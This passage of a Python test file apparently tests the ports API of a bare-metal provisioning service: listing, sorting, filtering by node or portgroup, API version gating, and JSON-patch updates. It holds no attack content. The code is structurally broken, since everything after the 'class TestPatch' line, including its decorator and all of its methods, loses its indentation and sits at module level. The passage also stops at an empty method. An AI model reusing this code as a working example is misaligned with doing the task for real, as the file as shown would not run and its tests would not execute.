            self.assertEqual('application/json', response.content_type)
            self.assertIn(invalid_key, response.json['error_message'])

    def _test_sort_key_allowed(self, detail=False):
        """sort_key=pxe_enabled works at MAX_VER for list and detail."""
        port_uuids = []
        for id_ in range(2):
            port = obj_utils.create_test_port(
                self.context,
                node_id=self.node.id,
                uuid=uuidutils.generate_uuid(),
                address='52:54:00:cf:2d:3%s' % id_,
                pxe_enabled=id_ % 2)
            port_uuids.append(port.uuid)
        headers = {api_base.Version.string: str(api_v1.MAX_VER)}
        detail_str = '/detail' if detail else ''
        data = self.get_json('/ports%s?sort_key=pxe_enabled' % detail_str,
                             headers=headers)
        data_uuids = [p['uuid'] for p in data['ports']]
        self.assertEqual(port_uuids, data_uuids)

    def test_sort_key_allowed(self):
        self._test_sort_key_allowed()

    def test_detail_sort_key_allowed(self):
        self._test_sort_key_allowed(detail=True)

    def _test_sort_key_not_allowed(self, detail=False):
        """sort_key=pxe_enabled is NOT_ACCEPTABLE below API 1.19."""
        headers = {api_base.Version.string: '1.18'}
        detail_str = '/detail' if detail else ''
        resp = self.get_json('/ports%s?sort_key=pxe_enabled' % detail_str,
                             headers=headers, expect_errors=True)
        self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_int)
        self.assertEqual('application/json', resp.content_type)

    def test_sort_key_not_allowed(self):
        self._test_sort_key_not_allowed()

    def test_detail_sort_key_not_allowed(self):
        self._test_sort_key_not_allowed(detail=True)

    @mock.patch.object(api_utils, 'get_rpc_node')
    def test_get_all_by_node_name_ok(self, mock_get_rpc_node):
        # GET /v1/ports specifying node_name - success
        mock_get_rpc_node.return_value = self.node
        for i in range(5):
            # Only the first three ports belong to the resolved node.
            if i < 3:
                node_id = self.node.id
            else:
                node_id = 100000 + i
            obj_utils.create_test_port(self.context,
                                       node_id=node_id,
                                       uuid=uuidutils.generate_uuid(),
                                       address='52:54:00:cf:2d:3%s' % i)
        data = self.get_json("/ports?node=%s" % 'test-node',
                             headers={api_base.Version.string: '1.5'})
        self.assertEqual(3, len(data['ports']))

    @mock.patch.object(api_utils, 'get_rpc_node')
    def test_get_all_by_node_uuid_and_name(self, mock_get_rpc_node):
        # GET /v1/ports specifying node and uuid - should only use node_uuid
        mock_get_rpc_node.return_value = self.node
        obj_utils.create_test_port(self.context, node_id=self.node.id)
        self.get_json('/ports/detail?node_uuid=%s&node=%s' %
                      (self.node.uuid, 'node-name'))
        mock_get_rpc_node.assert_called_once_with(self.node.uuid)

    @mock.patch.object(api_utils, 'get_rpc_node')
    def test_get_all_by_node_name_not_supported(self, mock_get_rpc_node):
        # GET /v1/ports specifying node_name - name not supported
        mock_get_rpc_node.side_effect = (
            exception.InvalidUuidOrName(name=self.node.uuid))
        for i in range(3):
            obj_utils.create_test_port(self.context,
                                       node_id=self.node.id,
                                       uuid=uuidutils.generate_uuid(),
                                       address='52:54:00:cf:2d:3%s' % i)
        data = self.get_json("/ports?node=%s" % 'test-node',
                             expect_errors=True)
        # Rejected by version gating before the node lookup ever happens.
        self.assertEqual(0, mock_get_rpc_node.call_count)
        self.assertEqual(http_client.NOT_ACCEPTABLE, data.status_int)

    @mock.patch.object(api_utils, 'get_rpc_node')
    def test_detail_by_node_name_ok(self, mock_get_rpc_node):
        # GET /v1/ports/detail specifying node_name - success
        mock_get_rpc_node.return_value = self.node
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        data = self.get_json('/ports/detail?node=%s' % 'test-node',
                             headers={api_base.Version.string: '1.5'})
        self.assertEqual(port.uuid, data['ports'][0]['uuid'])
        self.assertEqual(self.node.uuid, data['ports'][0]['node_uuid'])

    @mock.patch.object(api_utils, 'get_rpc_node')
    def test_detail_by_node_name_not_supported(self, mock_get_rpc_node):
        # GET /v1/ports/detail specifying node_name - name not supported
        mock_get_rpc_node.side_effect = (
            exception.InvalidUuidOrName(name=self.node.uuid))
        obj_utils.create_test_port(self.context, node_id=self.node.id)
        data = self.get_json('/ports/detail?node=%s' % 'test-node',
                             expect_errors=True)
        # Rejected by version gating before the node lookup ever happens.
        self.assertEqual(0, mock_get_rpc_node.call_count)
        self.assertEqual(http_client.NOT_ACCEPTABLE, data.status_int)

    def test_get_all_by_portgroup_uuid(self):
        """?portgroup=<uuid> filters the detail listing (API 1.24+)."""
        pg = obj_utils.create_test_portgroup(self.context,
                                             node_id=self.node.id)
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          portgroup_id=pg.id)
        data = self.get_json('/ports/detail?portgroup=%s' % pg.uuid,
                             headers={api_base.Version.string: '1.24'})
        self.assertEqual(port.uuid, data['ports'][0]['uuid'])
        self.assertEqual(pg.uuid,
                         data['ports'][0]['portgroup_uuid'])

    def test_get_all_by_portgroup_uuid_older_api_version(self):
        """?portgroup= is NOT_ACCEPTABLE below API 1.24."""
        pg = obj_utils.create_test_portgroup(self.context,
                                             node_id=self.node.id)
        response = self.get_json(
            '/ports/detail?portgroup=%s' % pg.uuid,
            headers={api_base.Version.string: '1.14'},
            expect_errors=True
        )
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)

    def test_get_all_by_portgroup_name(self):
        """?portgroup= also accepts a portgroup name."""
        pg = obj_utils.create_test_portgroup(self.context,
                                             node_id=self.node.id)
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          portgroup_id=pg.id)
        data = self.get_json('/ports/detail?portgroup=%s' % pg.name,
                             headers={api_base.Version.string: '1.24'})
        self.assertEqual(port.uuid, data['ports'][0]['uuid'])
        self.assertEqual(pg.uuid,
                         data['ports'][0]['portgroup_uuid'])
        self.assertEqual(1, len(data['ports']))

    def test_get_all_by_portgroup_uuid_and_node_uuid(self):
        """Combining ?portgroup= and ?node= is forbidden."""
        pg = obj_utils.create_test_portgroup(self.context,
                                             node_id=self.node.id)
        response = self.get_json(
            '/ports/detail?portgroup=%s&node=%s' % (pg.uuid, self.node.uuid),
            headers={api_base.Version.string: '1.24'},
            expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.FORBIDDEN, response.status_int)

    @mock.patch.object(api_port.PortsController, '_get_ports_collection')
    def test_detail_with_incorrect_api_usage(self, mock_gpc):
        # GET /v1/ports/detail specifying node and node_uuid.  In this case
        # we expect the node_uuid interface to be used.
        self.get_json('/ports/detail?node=%s&node_uuid=%s' %
                      ('test-node', self.node.uuid))
        mock_gpc.assert_called_once_with(self.node.uuid, mock.ANY, mock.ANY,
                                         mock.ANY, mock.ANY, mock.ANY,
                                         mock.ANY, mock.ANY)

    def test_portgroups_subresource_node_not_found(self):
        non_existent_uuid = 'eeeeeeee-cccc-aaaa-bbbb-cccccccccccc'
        response = self.get_json('/portgroups/%s/ports' % non_existent_uuid,
                                 expect_errors=True)
        self.assertEqual(http_client.NOT_FOUND, response.status_int)

    def test_portgroups_subresource_invalid_ident(self):
        invalid_ident = '123 123'
        response = self.get_json('/portgroups/%s/ports' % invalid_ident,
                                 headers={api_base.Version.string: '1.24'},
                                 expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertIn('Expected a logical name or UUID',
                      response.json['error_message'])
@mock.patch.object(rpcapi.ConductorAPI, 'update_port', autospec=True,
side_effect=_rpcapi_update_port)
class TestPatch(test_api_base.BaseApiTest):
def setUp(self):
    """Create a node with one port and stub out the conductor topic."""
    super(TestPatch, self).setUp()
    self.node = obj_utils.create_test_node(self.context)
    self.port = obj_utils.create_test_port(self.context,
                                           node_id=self.node.id)

    # No real conductor runs in these tests; fake the RPC topic lookup.
    p = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
    self.mock_gtf = p.start()
    self.mock_gtf.return_value = 'test-topic'
    self.addCleanup(p.stop)
def _test_success(self, mock_upd, patch, version):
    """Apply *patch* at API *version*; assert the update reached RPC."""
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch,
                           headers={api_base.Version.string: version})
    self.assertEqual(http_client.OK, resp.status_code)
    self.assertTrue(mock_upd.called)
    # The third positional RPC argument is the updated port object.
    self.assertEqual(self.port.id, mock_upd.call_args[0][2].id)
    return resp
def _test_old_api_version(self, mock_upd, patch, version):
    """Apply *patch* at an API *version* too old for the touched field."""
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch,
                           expect_errors=True,
                           headers={api_base.Version.string: version})
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_int)
    # The request must be rejected before any RPC update happens.
    self.assertFalse(mock_upd.called)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_update_byid(self, mock_notify, mock_upd):
    """A patch by UUID updates extra and emits start/end notifications."""
    extra = {'foo': 'bar'}
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/extra/foo',
                                 'value': 'bar',
                                 'op': 'add'}])
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(extra, response.json['extra'])
    # The port object forwarded to the conductor carries the new extra.
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(extra, kargs.extra)
    # One INFO/START and one INFO/END notification, in that order.
    mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
                                  obj_fields.NotificationLevel.INFO,
                                  obj_fields.NotificationStatus.START,
                                  node_uuid=self.node.uuid,
                                  portgroup_uuid=wtypes.Unset),
                                  mock.call(mock.ANY, mock.ANY, 'update',
                                  obj_fields.NotificationLevel.INFO,
                                  obj_fields.NotificationStatus.END,
                                  node_uuid=self.node.uuid,
                                  portgroup_uuid=wtypes.Unset)])
def test_update_byaddress_not_allowed(self, mock_upd):
    """Patching a port addressed by MAC (not UUID) is a 400."""
    patch_doc = [{'path': '/extra/foo', 'value': 'bar', 'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.address,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_int)
    self.assertIn(self.port.address, resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_update_not_found(self, mock_upd):
    """Patching a non-existent port UUID is a 404."""
    missing_uuid = uuidutils.generate_uuid()
    patch_doc = [{'path': '/extra/foo', 'value': 'bar', 'op': 'add'}]
    resp = self.patch_json('/ports/%s' % missing_uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.NOT_FOUND, resp.status_int)
    self.assertTrue(resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_replace_singular(self, mock_upd):
    """Replacing a scalar field (address) updates the port via RPC."""
    new_mac = 'aa:bb:cc:dd:ee:ff'
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           [{'path': '/address',
                             'value': new_mac,
                             'op': 'replace'}])
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
    self.assertEqual(new_mac, resp.json['address'])
    self.assertTrue(mock_upd.called)
    self.assertEqual(new_mac, mock_upd.call_args[0][2].address)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_replace_address_already_exist(self, mock_notify, mock_upd):
    """A duplicate MAC yields 409 and an INFO/START + ERROR notification."""
    address = 'aa:aa:aa:aa:aa:aa'
    mock_upd.side_effect = exception.MACAlreadyExists(mac=address)
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/address',
                                 'value': address,
                                 'op': 'replace'}],
                               expect_errors=True)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.CONFLICT, response.status_code)
    self.assertTrue(response.json['error_message'])
    # The update was attempted (conflict comes from the conductor side).
    self.assertTrue(mock_upd.called)
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(address, kargs.address)
    mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
                                  obj_fields.NotificationLevel.INFO,
                                  obj_fields.NotificationStatus.START,
                                  node_uuid=self.node.uuid,
                                  portgroup_uuid=wtypes.Unset),
                                  mock.call(mock.ANY, mock.ANY, 'update',
                                  obj_fields.NotificationLevel.ERROR,
                                  obj_fields.NotificationStatus.ERROR,
                                  node_uuid=self.node.uuid,
                                  portgroup_uuid=wtypes.Unset)])
def test_replace_node_uuid(self, mock_upd):
    """Replacing node_uuid with the same node is accepted."""
    patch_doc = [{'path': '/node_uuid',
                  'value': self.node.uuid,
                  'op': 'replace'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid, patch_doc)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
def test_replace_local_link_connection(self, mock_upd):
    """Replacing one key inside local_link_connection works at 1.19."""
    switch_id = 'aa:bb:cc:dd:ee:ff'
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path':
                                 '/local_link_connection/switch_id',
                                 'value': switch_id,
                                 'op': 'replace'}],
                               headers={api_base.Version.string: '1.19'})
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(switch_id,
                     response.json['local_link_connection']['switch_id'])
    self.assertTrue(mock_upd.called)
    # The updated dict is forwarded to the conductor as-is.
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(switch_id, kargs.local_link_connection['switch_id'])
def test_remove_local_link_connection_old_api(self, mock_upd):
    """Touching local_link_connection below API 1.19 is NOT_ACCEPTABLE."""
    patch_doc = [{'path': '/local_link_connection/switch_id',
                  'op': 'remove'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertTrue(resp.json['error_message'])
    self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_code)
def test_set_pxe_enabled_false_old_api(self, mock_upd):
    """Touching pxe_enabled with default (old) headers is NOT_ACCEPTABLE."""
    patch_doc = [{'path': '/pxe_enabled',
                  'value': False,
                  'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertTrue(resp.json['error_message'])
    self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_code)
def test_add_portgroup_uuid(self, mock_upd):
    """Adding portgroup_uuid succeeds at API 1.24."""
    pg = obj_utils.create_test_portgroup(self.context,
                                         node_id=self.node.id,
                                         uuid=uuidutils.generate_uuid(),
                                         address='bb:bb:bb:bb:bb:bb',
                                         name='bar')
    patch_doc = [{'path': '/portgroup_uuid',
                  'value': pg.uuid,
                  'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           headers={api_base.Version.string: '1.24'})
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
def test_replace_portgroup_uuid(self, mock_upd):
    """Replacing portgroup_uuid succeeds at API 1.24."""
    pg = obj_utils.create_test_portgroup(self.context,
                                         node_id=self.node.id,
                                         uuid=uuidutils.generate_uuid(),
                                         address='bb:bb:bb:bb:bb:bb',
                                         name='bar')
    patch_doc = [{'path': '/portgroup_uuid',
                  'value': pg.uuid,
                  'op': 'replace'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           headers={api_base.Version.string: '1.24'})
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
def test_replace_portgroup_uuid_remove(self, mock_upd):
    """Removing portgroup_uuid clears portgroup_id on the RPC object."""
    pg = obj_utils.create_test_portgroup(self.context,
                                         node_id=self.node.id,
                                         uuid=uuidutils.generate_uuid(),
                                         address='bb:bb:bb:bb:bb:bb',
                                         name='bar')
    headers = {api_base.Version.string: '1.24'}
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/portgroup_uuid',
                                 'value': pg.uuid,
                                 'op': 'remove'}],
                               headers=headers)
    self.assertEqual('application/json', response.content_type)
    # NOTE(review): unlike sibling tests there is no status-code
    # assertion here — consider adding assertEqual(OK, status_code).
    self.assertIsNone(mock_upd.call_args[0][2].portgroup_id)
def test_replace_portgroup_uuid_remove_add(self, mock_upd):
    """Removing then adding portgroup_uuid in one patch applies the add.

    The port object sent over RPC must end up pointing at the portgroup
    that was added last (pg1).
    """
    pg = obj_utils.create_test_portgroup(self.context,
                                         node_id=self.node.id,
                                         uuid=uuidutils.generate_uuid(),
                                         address='bb:bb:bb:bb:bb:bb',
                                         name='bar')
    pg1 = obj_utils.create_test_portgroup(self.context,
                                          node_id=self.node.id,
                                          uuid=uuidutils.generate_uuid(),
                                          address='bb:bb:bb:bb:bb:b1',
                                          name='bbb')
    headers = {api_base.Version.string: '1.24'}
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/portgroup_uuid',
                                 'value': pg.uuid,
                                 'op': 'remove'},
                                {'path': '/portgroup_uuid',
                                 'value': pg1.uuid,
                                 'op': 'add'}],
                               headers=headers)
    self.assertEqual('application/json', response.content_type)
    # Bug fix: previously assertTrue(pg1.id, ...) — assertTrue treats the
    # second argument as a failure *message*, so the check always passed
    # for a truthy pg1.id. assertEqual actually verifies the value.
    self.assertEqual(pg1.id, mock_upd.call_args[0][2].portgroup_id)
def test_replace_portgroup_uuid_old_api(self, mock_upd):
    """Touching portgroup_uuid below API 1.24 is NOT_ACCEPTABLE."""
    pg = obj_utils.create_test_portgroup(self.context,
                                         node_id=self.node.id,
                                         uuid=uuidutils.generate_uuid(),
                                         address='bb:bb:bb:bb:bb:bb',
                                         name='bar')
    patch_doc = [{'path': '/portgroup_uuid',
                  'value': pg.uuid,
                  'op': 'replace'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           headers={api_base.Version.string: '1.15'},
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_code)
def test_add_node_uuid(self, mock_upd):
    """'add' on node_uuid with the same node is accepted."""
    patch_doc = [{'path': '/node_uuid',
                  'value': self.node.uuid,
                  'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid, patch_doc)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
def test_add_node_id(self, mock_upd):
    """node_id is an internal field; adding it is a 400."""
    patch_doc = [{'path': '/node_id', 'value': '1', 'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertFalse(mock_upd.called)
def test_replace_node_id(self, mock_upd):
    """node_id is an internal field; replacing it is a 400."""
    patch_doc = [{'path': '/node_id', 'value': '1', 'op': 'replace'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertFalse(mock_upd.called)
def test_remove_node_id(self, mock_upd):
    """node_id is an internal field; removing it is a 400."""
    patch_doc = [{'path': '/node_id', 'op': 'remove'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertFalse(mock_upd.called)
def test_replace_non_existent_node_uuid(self, mock_upd):
    """Pointing node_uuid at an unknown node is a 400 naming the UUID."""
    bogus_uuid = '12506333-a81c-4d59-9987-889ed5f8687b'
    patch_doc = [{'path': '/node_uuid',
                  'value': bogus_uuid,
                  'op': 'replace'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertIn(bogus_uuid, resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_replace_multi(self, mock_upd):
    """Replacing several /extra keys in one patch updates them all."""
    extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
    self.port.extra = extra
    self.port.save()

    # Mutate every value so each key is genuinely replaced.
    # (Idiom: dict/list comprehensions instead of dict(genexpr) and an
    # append loop over .keys().)
    extra = {k: v + 'x' for k, v in extra.items()}
    patch = [{'path': '/extra/%s' % k, 'value': v, 'op': 'replace'}
             for k, v in extra.items()]
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               patch)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(extra, response.json['extra'])
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(extra, kargs.extra)
def test_remove_multi(self, mock_upd):
    """Remove one /extra key, then the whole /extra collection."""
    extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
    self.port.extra = extra
    self.port.save()

    # Removing one item from the collection
    extra.pop('foo1')
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/extra/foo1',
                                 'op': 'remove'}])
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(extra, response.json['extra'])
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(extra, kargs.extra)

    # Removing the collection
    extra = {}
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               [{'path': '/extra', 'op': 'remove'}])
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual({}, response.json['extra'])
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(extra, kargs.extra)

    # Assert nothing else was changed
    self.assertEqual(self.port.uuid, response.json['uuid'])
    self.assertEqual(self.port.address, response.json['address'])
def test_remove_non_existent_property_fail(self, mock_upd):
    """Removing an /extra key that does not exist is a 400."""
    patch_doc = [{'path': '/extra/non-existent', 'op': 'remove'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertTrue(resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_remove_mandatory_field(self, mock_upd):
    """Removing the mandatory address field is a 400."""
    patch_doc = [{'path': '/address', 'op': 'remove'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_code)
    self.assertTrue(resp.json['error_message'])
    self.assertIn('mandatory attribute', resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_add_root(self, mock_upd):
    """'add' on an existing top-level field acts as a replace."""
    new_mac = 'aa:bb:cc:dd:ee:ff'
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           [{'path': '/address',
                             'value': new_mac,
                             'op': 'add'}])
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.OK, resp.status_code)
    self.assertEqual(new_mac, resp.json['address'])
    self.assertTrue(mock_upd.called)
    self.assertEqual(new_mac, mock_upd.call_args[0][2].address)
def test_add_root_non_existent(self, mock_upd):
    """Adding an unknown top-level field is a 400."""
    patch_doc = [{'path': '/foo', 'value': 'bar', 'op': 'add'}]
    resp = self.patch_json('/ports/%s' % self.port.uuid,
                           patch_doc,
                           expect_errors=True)
    self.assertEqual('application/json', resp.content_type)
    self.assertEqual(http_client.BAD_REQUEST, resp.status_int)
    self.assertTrue(resp.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_add_multi(self, mock_upd):
    """A single PATCH request may add several /extra keys at once."""
    extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
    # Build one 'add' operation per key. Iterating items() avoids the
    # redundant extra[k] lookup the keys()-based loop performed.
    patch = [{'path': '/extra/%s' % key, 'value': value, 'op': 'add'}
             for key, value in extra.items()]
    response = self.patch_json('/ports/%s' % self.port.uuid,
                               patch)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(extra, response.json['extra'])
    kargs = mock_upd.call_args[0][2]
    self.assertEqual(extra, kargs.extra)
def test_remove_uuid(self, mock_upd):
    """The port UUID can never be removed."""
    patch = [{'path': '/uuid', 'op': 'remove'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               expect_errors=True)
    self.assertEqual(http_client.BAD_REQUEST, response.status_int)
    self.assertEqual('application/json', response.content_type)
    self.assertTrue(response.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_update_address_invalid_format(self, mock_upd):
    """Replacing /address with a malformed MAC must be rejected."""
    patch = [{'path': '/address', 'value': 'invalid-format',
              'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               expect_errors=True)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.BAD_REQUEST, response.status_int)
    self.assertTrue(response.json['error_message'])
    self.assertFalse(mock_upd.called)
def test_update_port_address_normalized(self, mock_upd):
    """MAC addresses are lower-cased on update."""
    upper_mac = 'AA:BB:CC:DD:EE:FF'
    patch = [{'path': '/address', 'value': upper_mac, 'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(upper_mac.lower(), response.json['address'])
    # The object handed to the conductor is normalized too.
    updated_port = mock_upd.call_args[0][2]
    self.assertEqual(upper_mac.lower(), updated_port.address)
def test_update_pxe_enabled_allowed(self, mock_upd):
    """pxe_enabled may be updated at API version 1.19."""
    headers = {api_base.Version.string: '1.19'}
    patch = [{'path': '/pxe_enabled', 'value': True, 'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               headers=headers)
    self.assertEqual(http_client.OK, response.status_code)
    self.assertEqual(True, response.json['pxe_enabled'])
def test_update_pxe_enabled_old_api_version(self, mock_upd):
    """Updating pxe_enabled before API 1.19 is not acceptable."""
    headers = {api_base.Version.string: '1.14'}
    patch = [{'path': '/pxe_enabled', 'value': True, 'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               expect_errors=True, headers=headers)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
    self.assertFalse(mock_upd.called)
def _test_physical_network_success(self, mock_upd, patch,
                                   expected_physical_network):
    # Helper to test an update to a port's physical_network that is
    # expected to succeed at API version 1.34.
    response = self._test_success(mock_upd, patch, '1.34')
    self.assertEqual(expected_physical_network,
                     response.json['physical_network'])
    # Re-read from the DB to verify the change was actually persisted,
    # not just echoed in the API response.
    self.port.refresh()
    self.assertEqual(expected_physical_network,
                     self.port.physical_network)
def test_add_physical_network(self, mock_upd):
    """Adding physical_network succeeds at API 1.34."""
    physnet = 'physnet1'
    patch = [{'path': '/physical_network', 'value': physnet, 'op': 'add'}]
    self._test_physical_network_success(mock_upd, patch, physnet)
def test_replace_physical_network(self, mock_upd):
    """Replacing an existing physical_network succeeds at API 1.34."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    patch = [{'path': '/physical_network', 'value': 'physnet2',
              'op': 'replace'}]
    self._test_physical_network_success(mock_upd, patch, 'physnet2')
def test_remove_physical_network(self, mock_upd):
    """Removing physical_network resets it to None at API 1.34."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    self._test_physical_network_success(
        mock_upd, [{'path': '/physical_network', 'op': 'remove'}], None)
def _test_physical_network_old_api_version(self, mock_upd, patch,
                                           expected_physical_network):
    # Helper to test an update to a port's physical network that is
    # expected to fail at API version 1.33.
    self._test_old_api_version(mock_upd, patch, '1.33')
    # The stored value must be unchanged after the rejected request.
    self.port.refresh()
    self.assertEqual(expected_physical_network, self.port.physical_network)
def test_add_physical_network_old_api_version(self, mock_upd):
    """Adding physical_network is rejected before API 1.34."""
    patch = [{'path': '/physical_network', 'value': 'physnet1',
              'op': 'add'}]
    self._test_physical_network_old_api_version(mock_upd, patch, None)
def test_replace_physical_network_old_api_version(self, mock_upd):
    """Replacing physical_network is rejected before API 1.34."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    patch = [{'path': '/physical_network', 'value': 'physnet2',
              'op': 'replace'}]
    self._test_physical_network_old_api_version(mock_upd, patch, 'physnet1')
def test_remove_physical_network_old_api_version(self, mock_upd):
    """Removing physical_network is rejected before API 1.34."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    self._test_physical_network_old_api_version(
        mock_upd, [{'path': '/physical_network', 'op': 'remove'}],
        'physnet1')
@mock.patch.object(objects.Port, 'supports_physical_network')
def _test_physical_network_upgrade(self, mock_upd, patch,
                                   expected_physical_network, mock_spn):
    # Helper to test an update to a port's physical network that is
    # expected to fail at API version 1.34 while the API service is pinned
    # to the Ocata release.
    # NOTE: mock_spn is injected by this method's own decorator and is
    # appended after the arguments that callers pass, hence it is last.
    mock_spn.return_value = False
    self._test_old_api_version(mock_upd, patch, '1.34')
    self.port.refresh()
    self.assertEqual(expected_physical_network, self.port.physical_network)
def test_add_physical_network_upgrade(self, mock_upd):
    """Adding physical_network fails while pinned to Ocata."""
    patch = [{'path': '/physical_network', 'value': 'physnet1',
              'op': 'add'}]
    self._test_physical_network_upgrade(mock_upd, patch, None)
def test_replace_physical_network_upgrade(self, mock_upd):
    """Replacing physical_network fails while pinned to Ocata."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    patch = [{'path': '/physical_network', 'value': 'physnet2',
              'op': 'replace'}]
    self._test_physical_network_upgrade(mock_upd, patch, 'physnet1')
def test_remove_physical_network_upgrade(self, mock_upd):
    """Removing physical_network fails while pinned to Ocata."""
    self.port.physical_network = 'physnet1'
    self.port.save()
    self._test_physical_network_upgrade(
        mock_upd, [{'path': '/physical_network', 'op': 'remove'}],
        'physnet1')
def test_invalid_physnet_non_text(self, mock_upd):
